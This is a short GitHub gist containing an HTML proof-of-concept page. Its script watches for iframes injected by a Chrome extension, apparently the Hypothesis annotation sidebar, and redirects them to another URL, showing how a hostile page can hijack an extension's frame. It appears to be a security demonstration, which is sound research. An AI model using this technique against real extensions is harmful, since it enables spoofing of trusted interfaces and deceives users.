Skip to content

Instantly share code, notes, and snippets.

@robertknight robertknight/evil-page.html Secret
Last active Mar 8, 2017

Embed
What would you like to do?
Overwriting the sidebar app
<html>
<head>
<meta charset="UTF-8">
</head>
<body>
I am an evil page.
<script>
const mo = new MutationObserver(() => {
const frames = Array.from(document.body.querySelectorAll('iframe'));
frames.forEach((f) => {
// Crude test to check if the iframe belongs to the
// H extension. There are many other ways it could be done.
if (f.src.match(/chrome-extension/) && !f.haxxored) {
setTimeout(() => {
f.contentWindow.location = 'https://hypothes.is/app.html';
f.haxxored = true;
}, 100);
}
});
});
mo.observe(document.body, {
childList: true,
subtree: true,
});
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.